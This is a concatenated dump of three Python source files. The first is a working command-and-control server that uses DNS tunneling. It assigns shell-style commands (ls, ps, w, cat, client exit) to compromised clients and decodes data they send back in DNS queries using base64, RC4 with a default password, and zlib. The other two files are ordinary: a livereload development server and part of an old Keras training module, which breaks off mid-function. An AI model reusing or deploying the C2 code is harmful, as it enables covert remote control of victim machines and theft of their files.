def start(self):
self.completed = False
self.started = True
self.segments = []
def add_segment(self, data):
self.segments.append(data)
def set_command(self, command, arg=None):
self.command = command
self.arg = arg
self.completed = False
class Server:
def __init__(self, args):
self.password = args.password
self.verbose = args.verbose
self.listening_port = args.port
self.listening_ip = args.ip
self.connected_clients = {}
self.commands_for_clients: Dict[Any, Command] = {}
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.bind((self.listening_ip, self.listening_port))
self.socket.settimeout(10)
self.__log("Started listening on port: {}, ip: {}".format(self.listening_port, self.listening_ip))
self.running = False
def __log(self, message):
if not self.verbose:
return
print("CCS: {}".format(message))
def run(self):
if self.running:
self.__log("Already running...")
return
self.running = True
while self.running:
try:
data, addr = self.socket.recvfrom(1024)
request = DNSRecord.parse(data)
except Exception:
self.__log("No valid input...")
continue
n = get_request_name(request.get_q().get_qname())
self.__log("{}: Got request: {}".format(addr, n))
if request.get_q().get_qname().matchGlob(client_to_serv["HB"]):
# It is a heartbeat..
self.__log("{}: Heartbeat".format(addr))
repl = self.heartbeat_reply(request.reply(), addr)
elif request.get_q().get_qname().matchSuffix(client_to_serv["RESP"]):
# It is a reply for our request:
self.__log("{}: We got a response for our request!".format(addr))
repl = self.extract_data_from_request(request, addr)
elif request.get_q().get_qname().matchGlob(client_to_serv["DONE"]):
# The client has finished sending us data...
self.__log("{}: Finished request".format(addr))
repl = self.finished_stream(request, addr)
else:
self.__log("{}: ERROR: Got unknown packet, that violates the protocol! Ignoring...".format(addr))
return
self.socket.sendto(bytes(repl.pack()), addr)
def finished_stream(self, request, addr):
if addr not in self.connected_clients or not self.commands_for_clients[addr].started:
self.__log("{}: ERROR: Got a protocol-violated message! Sending reset signal...".format(addr))
command = serv_to_client["RST"]
else:
self.__log(
"{}: Finished receiving stream for command: {}".format(addr, self.commands_for_clients[addr].command))
command = serv_to_client["ACK"]
self.commands_for_clients[addr].completed = True
if not self.decrypt_segments(addr):
self.__log("Decrypting segments failed. Sending RST error signal")
command = serv_to_client["RST"]
self.commands_for_clients[addr].completed = False
self.commands_for_clients[addr].segments = []
else:
print("-- {}: Answered! Refresh to show it.".format(addr))
repl = request.reply()
repl.add_answer(RR(request.get_q().get_qname(), QTYPE.A, rdata=A(command), ttl=60))
return repl
def decrypt_segments(self, addr) -> bool:
"""
Attempts to decrypt segments
:return: Whether the decryption was successful
"""
try:
segments_edited = [(re.sub("{}\.$".format(client_to_serv["RESP"]), "", i).replace(".", ""))
for i in self.commands_for_clients[addr].segments]
flattened = bytes("".join(segments_edited), "utf-8")
flattened_replaced = flattened.replace(b"_", b"/").replace(b"-", b"+")
replaced_padded = flattened_replaced + b"=" * ((4 - len(flattened_replaced) % 4) % 4)
decoded = base64.b64decode(replaced_padded)
deciphered = ARC4(self.password).decrypt(decoded)
uncompressed = zlib.decompress(deciphered)
self.commands_for_clients[addr].segments = uncompressed.decode("utf-8")
except Exception as e:
print("-- Error while processing data from {}: {}".format(addr, e))
return False
return True
def extract_data_from_request(self, request, addr):
if addr not in self.connected_clients or not self.commands_for_clients[addr].started:
self.__log("{}: ERROR: Got a protocol-violated message! Sending reset signal...".format(addr))
command = serv_to_client["RST"]
else:
self.__log("{}: Got data segment for command: {}".format(addr, self.commands_for_clients[addr].command))
qname = str(request.get_q().get_qname())
self.commands_for_clients[addr].add_segment(qname)
command = serv_to_client["ACK"]
repl = request.reply()
repl.add_answer(RR(request.get_q().get_qname(), QTYPE.A, rdata=A(command), ttl=60))
return repl
def heartbeat_reply(self, request, addr):
new_one = addr not in self.connected_clients
self.connected_clients[addr] = datetime.datetime.now()
args = None
if new_one:
# We register a new client
print("-- New client {} registered!".format(addr))
self.commands_for_clients[addr] = Command(addr)
command = "ACK"
elif self.commands_for_clients[addr].completed:
# We do not have any commands for this machine
command = "NOP"
else:
# We have job for you!
if self.commands_for_clients[addr].started:
self.__log(
"{}: ERROR: The client has sent us a Heartbeat, while it was supposed to send a reply!".format(
addr))
self.commands_for_clients[addr].started = False
command = "RST"
else:
self.commands_for_clients[addr].start()
command = self.commands_for_clients[addr].command
args = self.commands_for_clients[addr].arg
# Sanity check
if command is None:
self.__log("{}: Cannot reply with None message!".format(addr))
return
reply = request.reply()
self.__log("{}: Sending {} command...".format(addr, command))
reply.add_answer(RR(client_to_serv["HB"], QTYPE.TXT, rdata=TXT(serv_to_client[command]), ttl=60))
if args is not None:
reply.add_answer(RR(client_to_serv["HB"], QTYPE.TXT, rdata=TXT(args), ttl=60))
return reply
def cleanup_connected(self):
"""
Removes all inactive clients from the client list
"""
addresses = list(self.connected_clients.keys())
for i in addresses:
# TODO: Change back to 200
if abs((datetime.datetime.now() - self.connected_clients[i]).total_seconds()) > 20:
print("Cleaning up client {} because of inactivity".format(i))
del self.connected_clients[i]
del self.commands_for_clients[i]
def next_command(self):
"""
Instruction for the Server object to get and answer a new command from the user.
"""
for addr in self.commands_for_clients:
if self.commands_for_clients[addr].completed and self.commands_for_clients[addr].started and type(
self.commands_for_clients[addr].segments) == str:
print("\n~~~~~~~~~~~~~~~~\nReply from {} for request: {}:".format(addr, self.commands_for_clients[
addr].command))
print(self.commands_for_clients[addr].segments)
print("~~~~~~~~~~~~~~~~")
self.commands_for_clients[addr].started = False
try:
if len(self.connected_clients) == 0:
print("No clients connected.")
time.sleep(5)
return
self.cleanup_connected()
print("\n================")
# Select IP to give commands to:
print("0: Refresh")
addresses = list(self.connected_clients.keys())
for i in range(len(addresses)):
print("{}: {} {}".format(i + 1, addresses[i],
"" if self.commands_for_clients[addresses[i]].completed else "- BUSY"))
selected_ip = int(input("Select your target: \n================\n"))
if selected_ip == 0:
return
else:
# Compensate for the rescan option
selected_ip -= 1
tar_addr = list(self.connected_clients.keys())[selected_ip]
if not self.commands_for_clients[tar_addr].completed:
print("You have selected a busy client! Try again when it finishes its task.")
return
print("\n================")
# Select command:
print("1: ls")
print("2: w")
print("3: ps")
print("4: cat")
print("5: nop")
print("6: client-exit")
print("7: exit")
command = int(input("Command number: \n================\n"))
argument = None
if command == 1:
command = "LS"
argument = input("Enter argument: ")
elif command == 2:
command = "W"
elif command == 3:
command = "PS"
elif command == 4:
command = "CAT"
argument = input("Enter argument: ")
elif command == 5:
return
elif command == 6:
command = "SD"
elif command == 7:
self.running = False
return
self.commands_for_clients[tar_addr].set_command(command, argument)
except Exception as e:
print("Invalid input! {}".format(e), file=sys.stderr)
class Worker:
def __init__(self, server: Server):
self.thread = threading.Thread(target=server.run, args=())
self.thread.daemon = True
self.server = server
def start(self):
self.thread.start()
def stop(self):
print("Stopping daemon...")
self.server.running = False
self.thread.join()
def signal_handler(sig, frame, worker):
print('You pressed Ctrl+C!')
worker.stop()
sys.exit(0)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument("-pass", "--password", help="The password used to encrypt the communication", type=str,
default="heslo")
parser.add_argument("-v", "--verbose", help="Show detailed debug info", type=bool, default=False)
parser.add_argument("-ip", "--ip", help="Server IP", type=str, default="127.0.0.1")
parser.add_argument("-p", "--port", help="Port of this server", type=int, default=51271)
args = parser.parse_args()
server = Server(args)
worker = Worker(server)
signal.signal(signal.SIGINT, lambda sig, frame: signal_handler(sig, frame, worker))
worker.start()
while server.running:
server.next_command()
time.sleep(1)
worker.stop()
|
server.py | """
livereload.server
~~~~~~~~~~~~~~~~~
WSGI app server for livereload.
:copyright: (c) 2013 - 2015 by Hsiaoming Yang
:license: BSD, see LICENSE for more details.
"""
import os
import time
import shlex
import logging
import threading
import webbrowser
from subprocess import Popen, PIPE
from tornado.wsgi import WSGIContainer
from tornado.ioloop import IOLoop
from tornado.autoreload import add_reload_hook
from tornado import web
from tornado import escape
from tornado import httputil
from tornado.log import LogFormatter
from .handlers import LiveReloadHandler, LiveReloadJSHandler
from .handlers import ForceReloadHandler, StaticFileHandler
from .watcher import get_watcher_class
import sys
if sys.version_info >= (3, 7):
import errno
else:
from os import errno
if sys.version_info >= (3, 8) and sys.platform == 'win32':
import asyncio
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
logger = logging.getLogger('livereload')
HEAD_END = b'</head>'
def set_header(fn, name, value):
"""Helper Function to Add HTTP headers to the server"""
def set_default_headers(self, *args, **kwargs):
fn(self, *args, **kwargs)
self.set_header(name, value)
return set_default_headers
def shell(cmd, output=None, mode='w', cwd=None, shell=False):
"""Execute a shell command.
You can add a shell command::
server.watch(
'style.less', shell('lessc style.less', output='style.css')
)
:param cmd: a shell command, string or list
:param output: output stdout to the given file
:param mode: only works with output, mode ``w`` means write,
mode ``a`` means append
:param cwd: set working directory before command is executed.
:param shell: if true, on Unix the executable argument specifies a
replacement shell for the default ``/bin/sh``.
"""
if not output:
output = os.devnull
else:
folder = os.path.dirname(output)
if folder and not os.path.isdir(folder):
os.makedirs(folder)
if not isinstance(cmd, (list, tuple)) and not shell:
cmd = shlex.split(cmd)
def run_shell():
try:
p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE, cwd=cwd,
shell=shell)
except OSError as e:
logger.error(e)
if e.errno == errno.ENOENT: # file (command) not found
logger.error("maybe you haven't installed %s", cmd[0])
return e
stdout, stderr = p.communicate()
if stderr:
logger.error(stderr)
return stderr
#: stdout is bytes, decode for python3
stdout = stdout.decode()
with open(output, mode) as f:
f.write(stdout)
return run_shell
class LiveScriptInjector(web.OutputTransform):
def __init__(self, request):
super().__init__(request)
def transform_first_chunk(self, status_code, headers, chunk, finishing):
if HEAD_END in chunk:
chunk = chunk.replace(HEAD_END, self.script + HEAD_END)
if 'Content-Length' in headers:
length = int(headers['Content-Length']) + len(self.script)
headers['Content-Length'] = str(length)
return status_code, headers, chunk
class LiveScriptContainer(WSGIContainer):
def __init__(self, wsgi_app, script=''):
self.wsgi_app = wsgi_app
self.script = script
def __call__(self, request):
data = {}
response = []
def start_response(status, response_headers, exc_info=None):
data["status"] = status
data["headers"] = response_headers
return response.append
app_response = self.wsgi_app(
WSGIContainer.environ(request), start_response)
try:
response.extend(app_response)
body = b"".join(response)
finally:
if hasattr(app_response, "close"):
app_response.close()
if not data:
raise Exception("WSGI app did not call start_response")
status_code, reason = data["status"].split(' ', 1)
status_code = int(status_code)
headers = data["headers"]
header_set = {k.lower() for (k, v) in headers}
body = escape.utf8(body)
if HEAD_END in body:
body = body.replace(HEAD_END, self.script + HEAD_END)
if status_code != 304:
if "content-type" not in header_set:
headers.append((
"Content-Type",
"application/octet-stream; charset=UTF-8"
))
if "content-length" not in header_set:
headers.append(("Content-Length", str(len(body))))
if "server" not in header_set:
headers.append(("Server", "LiveServer"))
start_line = httputil.ResponseStartLine(
"HTTP/1.1", status_code, reason
)
header_obj = httputil.HTTPHeaders()
for key, value in headers:
if key.lower() == 'content-length':
value = str(len(body))
header_obj.add(key, value)
request.connection.write_headers(start_line, header_obj, chunk=body)
request.connection.finish()
self._log(status_code, request)
class Server:
"""Livereload server interface.
Initialize a server and watch file changes::
server = Server(wsgi_app)
server.serve()
:param app: a wsgi application instance
:param watcher: A Watcher instance, you don't have to initialize
it by yourself. Under Linux, you will want to install
pyinotify and use INotifyWatcher() to avoid wasted
CPU usage.
"""
def __init__(self, app=None, watcher=None):
self.root = None
self.app = app
if not watcher:
watcher_cls = get_watcher_class()
watcher = watcher_cls()
self.watcher = watcher
self.SFH = StaticFileHandler
def setHeader(self, name, value):
"""Add or override HTTP headers at the at the beginning of the
request.
Once you have intialized a server, you can add one or more
headers before starting the server::
server.setHeader('Access-Control-Allow-Origin', '*')
server.setHeader('Access-Control-Allow-Methods', '*')
server.serve()
:param name: The name of the header field to be defined.
:param value: The value of the header field to be defined.
"""
StaticFileHandler.set_default_headers = set_header(
StaticFileHandler.set_default_headers, name, value)
self.SFH = StaticFileHandler
def watch(self, filepath, func=None, delay=None, ignore=None):
"""Add the given filepath for watcher list.
Once you have intialized a server, watch file changes before
serve the server::
server.watch('static/*.stylus', 'make static')
def alert():
print('foo')
server.watch('foo.txt', alert)
server.serve()
:param filepath: files to be watched, it can be a filepath,
a directory, or a glob pattern
:param func: the function to be called, it can be a string of
shell command, or any callable object without
parameters
:param delay: Delay sending the reload message. Use 'forever' to
not send it. This is useful to compile sass files to
css, but reload on changed css files then only.
:param ignore: A function return True to ignore a certain pattern of
filepath.
"""
if isinstance(func, str):
cmd = func
func = shell(func)
func.name = f"shell: {cmd}"
self.watcher.watch(filepath, func, delay, ignore=ignore)
def application(self, port, host, liveport=None, debug=None,
live_css=True):
LiveReloadHandler.watcher = self.watcher
LiveReloadHandler.live_css = live_css
if debug is None and self.app:
debug = True
live_handlers = [
(r'/livereload', LiveReloadHandler),
(r'/forcereload', ForceReloadHandler),
(r'/livereload.js', LiveReloadJSHandler)
]
# The livereload.js snippet.
# Uses JavaScript to dynamically inject the client's hostname.
# This allows for serving on 0.0.0.0.
live_script = (
'<script type="text/javascript">(function(){'
'var s=document.createElement("script");'
'var port=%s;'
's.src="//"+window.location.hostname+":"+port'
'+ "/livereload.js?port=" + port;'
'document.head.appendChild(s);'
'})();</script>'
)
if liveport:
live_script = escape.utf8(live_script % liveport)
else:
live_script = escape.utf8(live_script % "(window.location.port || (window.location.protocol == 'https:' ? 443: 80))")
web_handlers = self.get_web_handlers(live_script)
class ConfiguredTransform(LiveScriptInjector):
script = live_script
if not liveport:
handlers = live_handlers + web_handlers
app = web.Application(
handlers=handlers,
debug=debug,
transforms=[ConfiguredTransform]
)
app.listen(port, address=host)
else:
app = web.Application(
handlers=web_handlers,
debug=debug,
transforms=[ConfiguredTransform]
)
app.listen(port, address=host)
live = web.Application(handlers=live_handlers, debug=False)
live.listen(liveport, address=host)
def get_web_handlers(self, script):
if self.app:
fallback = LiveScriptContainer(self.app, script)
return [(r'.*', web.FallbackHandler, {'fallback': fallback})]
return [
(r'/(.*)', self.SFH, {
'path': self.root or '.',
'default_filename': self.default_filename,
}),
]
def serve(self, port=5500, liveport=None, host=None, root=None, debug=None,
open_url=False, restart_delay=2, open_url_delay=None,
live_css=True, default_filename='index.html'):
"""Start serve the server with the given port.
:param port: serve on this port, default is 5500
:param liveport: live reload on this port
:param host: serve on this hostname, default is 127.0.0.1
:param root: serve static on this root directory
:param debug: set debug mode, which autoreloads the app on code changes
via Tornado (and causes polling). Defaults to True when
``self.app`` is set, otherwise False.
:param open_url_delay: open webbrowser after the delay seconds
:param live_css: whether to use live css or force reload on css.
Defaults to True
:param default_filename: launch this file from the selected root on startup
"""
host = host or '127.0.0.1'
if root is not None:
self.root = root
self._setup_logging()
logger.info(f'Serving on http://{host}:{port}')
self.default_filename = default_filename
self.application(
port, host, liveport=liveport, debug=debug, live_css=live_css)
# Async open web browser after 5 sec timeout
if open_url:
logger.error('Use `open_url_delay` instead of `open_url`')
if open_url_delay is not None:
def opener():
time.sleep(open_url_delay)
webbrowser.open(f'http://{host}:{port}')
threading.Thread(target=opener).start()
try:
self.watcher._changes.append(('__livereload__', restart_delay))
LiveReloadHandler.start_tasks()
add_reload_hook(lambda: IOLoop.instance().close(all_fds=True))
IOLoop.instance().start()
except KeyboardInterrupt:
logger.info('Shutting down...')
def _setup_logging(self):
logger.setLevel(logging.INFO)
channel = logging.StreamHandler()
channel.setFormatter(LogFormatter())
logger.addHandler(channel)
# need a tornado logging handler to prevent IOLoop._setup_logging
logging.getLogger('tornado').addHandler(channel)
|
training.py | from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
import six
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import objectives
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
def standardize_input_data(data, names, shapes=None,
check_batch_dim=True,
exception_prefix=''):
'''Users may pass data as a list of arrays, dictionary of arrays,
or as a single array. We normalize this to an ordered list of
arrays (same order as `names`), while checking that the provided
arrays have shapes that match the network's expectations.
'''
if type(data) is dict:
arrays = []
for name in names:
if name not in data:
raise Exception('No data provided for "' +
name + '". Need data for each key in: ' +
str(data.keys()))
arrays.append(data[name])
elif type(data) is list:
if len(data) != len(names):
if len(data) > 0 and hasattr(data[0], 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': the list of Numpy arrays '
'that you are passing to your model '
'is not the size the model expected. '
'Expected to see ' + str(len(names)) +
' arrays but instead got '
'the following list of ' + str(len(data)) +
' arrays: ' + str(data)[:200] +
'...')
else:
if len(names) == 1:
data = [np.asarray(data)]
else:
raise Exception('Error when checking ' + exception_prefix +
': you are passing a list as '
'input to your model, '
'but the model expects '
'a list of ' + str(len(names)) +
' Numpy arrays instead. '
'The list you passed was: ' +
str(data)[:200])
arrays = data
else:
if not hasattr(data, 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': data should be a Numpy array, '
'or list/dict of Numpy arrays. '
'Found: ' + str(data)[:200] + '...')
if len(names) != 1:
# case: model expects multiple inputs but only received
# a single Numpy array
raise Exception('The model expects ' + str(len(names)) +
' input arrays, but only received one array. '
'Found: array with shape ' + str(data.shape))
arrays = [data]
# make arrays at least 2D
for i in range(len(names)):
array = arrays[i]
if len(array.shape) == 1:
array = np.expand_dims(array, 1)
arrays[i] = array
# check shapes compatibility
if shapes:
for i in range(len(names)):
if shapes[i] is None:
continue
array = arrays[i]
if len(array.shape) != len(shapes[i]):
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have ' + str(len(shapes[i])) +
' dimensions, but got array with shape ' +
str(array.shape))
for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
if not j and not check_batch_dim:
# skip the first axis
continue
if ref_dim:
if ref_dim != dim:
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have shape ' + str(shapes[i]) +
' but got array with shape ' +
str(array.shape))
return arrays
def standardize_sample_or_class_weights(x_weight, output_names, weight_type):
if x_weight is None or len(x_weight) == 0:
return [None for _ in output_names]
if len(output_names) == 1:
if type(x_weight) is list and len(x_weight) == 1:
return x_weight
if type(x_weight) is dict and output_names[0] in x_weight:
return [x_weight[output_names[0]]]
else:
return [x_weight]
if type(x_weight) is list:
if len(x_weight) != len(output_names):
raise Exception('Provided `' + weight_type + '` was a list of ' +
str(len(x_weight)) +
' elements, but the model has ' +
str(len(output_names)) + ' outputs. '
'You should provide one `' + weight_type + '`'
'array per model output.')
return x_weight
if type(x_weight) is dict:
x_weights = []
for name in output_names:
x_weights.append(x_weight.get(name))
return x_weights
else:
raise Exception('The model has multiple outputs, so `' +
weight_type + '` '
'should be either a list of a dict. '
'Provided `' + weight_type +
'` type not understood: ' +
str(x_weight))
def standardize_class_weights(class_weight, output_names):
return standardize_sample_or_class_weights(class_weight,
output_names,
'class_weight')
def standardize_sample_weights(sample_weight, output_names):
return standardize_sample_or_class_weights(sample_weight,
output_names,
'sample_weight')
def check_array_lengths(X, Y, W):
x_lengths = [x.shape[0] for x in X]
y_lengths = [y.shape[0] for y in Y]
w_lengths = [w.shape[0] for w in W]
set_x = set(x_lengths)
if len(set_x) != 1:
raise Exception('All input arrays (x) should have '
'the same number of samples.')
set_y = set(y_lengths)
if len(set_y) != 1:
raise Exception('All target arrays (y) should have '
'the same number of samples.')
set_w = set(w_lengths)
if len(set_w) != 1:
raise Exception('All sample_weight arrays should have '
'the same number of samples.')
if list(set_x)[0] != list(set_y)[0]:
raise Exception('Input arrays should have '
'the same number of samples as target arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_y)[0]) + ' target samples.')
if list(set_x)[0] != list(set_w)[0]:
raise Exception('Sample_weight arrays should have '
'the same number of samples as input arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_w)[0]) + ' target samples.')
def check_loss_and_target_compatibility(targets, losses, output_shapes):
assert len(targets) == len(losses) == len(output_shapes)
key_losses = {'mean_square_error',
'binary_crossentropy',
'categorical_crossentropy'}
for y, loss, shape in zip(targets, losses, output_shapes):
if loss.__name__ == 'categorical_crossentropy':
if y.shape[1] == 1:
raise Exception('You are passing a target array of shape ' + str(y.shape) +
' while using as loss `categorical_crossentropy`. '
'`categorical_crossentropy` expects '
'targets to be binary matrices (1s and 0s) '
'of shape (samples, classes). '
'If your targets are integer classes, '
'you can convert them to the expected format via:\n'
'```\n'
'from keras.utils.np_utils import to_categorical\n'
'y_binary = to_categorical(y_int)\n'
'```\n'
'\n'
'Alternatively, you can use the loss function '
'`sparse_categorical_crossentropy` instead, '
'which does expect integer targets.')
if loss.__name__ in key_losses and shape[1] is not None and y.shape[1] != shape[1]:
raise Exception('A target array with shape ' + str(y.shape) +
' was passed for an output of shape ' + str(shape) +
' while using as loss `' + loss.__name__ + '`. '
'This loss expects '
'targets to have the same shape '
'as the output.')
def collect_metrics(metrics, output_names):
if not metrics:
return [[] for _ in output_names]
if type(metrics) is list:
# we then apply all metrics to all outputs.
return [copy.copy(metrics) for _ in output_names]
elif type(metrics) is dict:
nested_metrics = []
for name in output_names:
output_metrics = metrics.get(name, [])
if type(output_metrics) is not list:
output_metrics = [output_metrics]
nested_metrics.append(output_metrics)
return nested_metrics
else:
raise Exception('Type of `metrics` argument not understood. '
'Expected a list or dictionary, found: ' +
str(metrics))
def collect_trainable_weights(layer):
'''Collects all `trainable_weights` attributes,
excluding any sublayers where `trainable` is set the `False`.
'''
trainable = getattr(layer, 'trainable', True)
if not trainable:
return []
weights = []
if layer.__class__.__name__ == 'Sequential':
for sublayer in layer.flattened_layers:
weights += collect_trainable_weights(sublayer)
elif layer.__class__.__name__ == 'Model':
for sublayer in layer.layers:
weights += collect_trainable_weights(sublayer)
elif layer.__class__.__name__ == 'Graph':
for sublayer in layer._graph_nodes.values():
weights += collect_trainable_weights(sublayer)
else:
weights += layer.trainable_weights
# dedupe weights
weights = list(set(weights))
weights.sort(key=lambda x: x.name)
return weights
def batch_shuffle(index_array, batch_size):
'''This shuffles an array in a batch-wise fashion.
Useful for shuffling HDF5 arrays
(where one cannot access arbitrary indices).
'''
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def make_batches(size, batch_size):
'''Returns a list of batch indices (tuples of indices).
'''
nb_batch = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size))
for i in range(0, nb_batch)]
def slice_X(X, start=None, stop=None):
'''This takes an array-like, or a list of
array-likes, and outputs:
- X[start:stop] if X is an array-like
- [x[start:stop] for x in X] if X in a list
Can also work on list/array of indices: `slice_X(x, indices)`
# Arguments:
start: can be an integer index (start index)
or a list/array of indices
stop: integer (stop index); should be None if
`start` was a list.
'''
if type(X) == list:
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in X]
else:
return [x[start:stop] for x in X]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return X[start]
else:
return X[start:stop]
def weighted_objective(fn):
'''Transforms an objective function `fn(y_true, y_pred)`
into a sample-weighted, cost-masked objective function
`fn(y_true, y_pred, weights, mask)`.
'''
def weighted(y_true, y_pred, weights, mask=None):
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
def standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
'''Performs weight input validation and standardization
to a single sample-wise (or timestep-wise) weight array.
'''
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
raise Exception('"sample_weight_mode '
'should be None or "temporal". '
'Found: ' + str(sample_weight_mode))
if len(y.shape) < 3:
raise Exception('Found a sample_weight array for '
'an input with shape ' +
str(y.shape) + '. '
'Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weights, '
'you should specify sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
assert len(sample_weight.shape) <= len(y.shape)
# TODO: proper error message
assert y.shape[:sample_weight.ndim] == sample_weight.shape
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise Exception('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],), dtype=K.floatx())
else:
return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
def generator_queue(generator, max_q_size=10,
wait_time=0.05, nb_worker=1, pickle_safe=False):
'''Builds a queue out of a data generator.
If pickle_safe, use a multiprocessing approach. Else, use threading.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
'''
generator_threads = []
if pickle_safe:
q = multiprocessing.Queue(maxsize=max_q_size)
_stop = multiprocessing.Event()
else:
q = queue.Queue()
_stop = threading.Event()
try:
def data_generator_task():
while not _stop.is_set():
try:
if pickle_safe or q.qsize() < max_q_size:
generator_output = next(generator)
q.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
_stop.set()
raise
for i in range(nb_worker):
if pickle_safe:
# Reset random seed else all children processes share the same seed
np.random.seed()
thread = multiprocessing.Process(target=data_generator_task)
else:
thread = threading.Thread(target=data_generator_task)
generator_threads.append(thread)
thread.daemon = True
thread.start()
except:
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
q.close()
raise
return q, _stop
class Model(Container):
def compile(self, optimizer, loss, metrics=[], loss_weights=None,
sample_weight_mode=None, **kwargs):
'''Configures the model for training.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [objectives](/objectives).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of objectives.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to "temporal".
"None" defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
kwargs: when using the Theano backend, these arguments
are passed into K.function. Ignored for Tensorflow backend.
'''
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# prepare loss weights
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif type(loss_weights) is dict:
for name in loss_weights:
if name not in self.output_names:
raise Exception('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif type(loss_weights) is list:
if len(loss_weights) != len(self.outputs):
raise Exception('When passing a list as loss_weights, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss_weights))
loss_weights_list = loss_weights
else:
raise Exception('Could not interpret loss_weights argument: ' +
str(loss_weights))
# prepare loss functions
if type(loss) is dict:
for name in loss:
if name not in self.output_names:
raise Exception('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
raise Exception('Output "' + name +
'" missing from loss dictionary')
loss_functions.append(objectives.get(loss[name]))
elif type(loss) is list:
if len(loss) != len(self.outputs):
raise Exception('When passing a list as loss, '
'it should have one entry per model outputs. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [objectives.get(l) for l in loss]
else:
loss_function = objectives.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [weighted_objective(fn) for fn in loss_functions]
# prepare output masks
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if type(masks) is not list:
masks = [masks]
# prepare sample weights
if type(sample_weight_mode) is dict:
for name in sample_weight_mode:
if name not in self.output_names:
raise Exception('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
sample_weights = []
sample_weight_modes = []
for name in self.output_names:
if name not in sample_weight_mode:
raise Exception('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
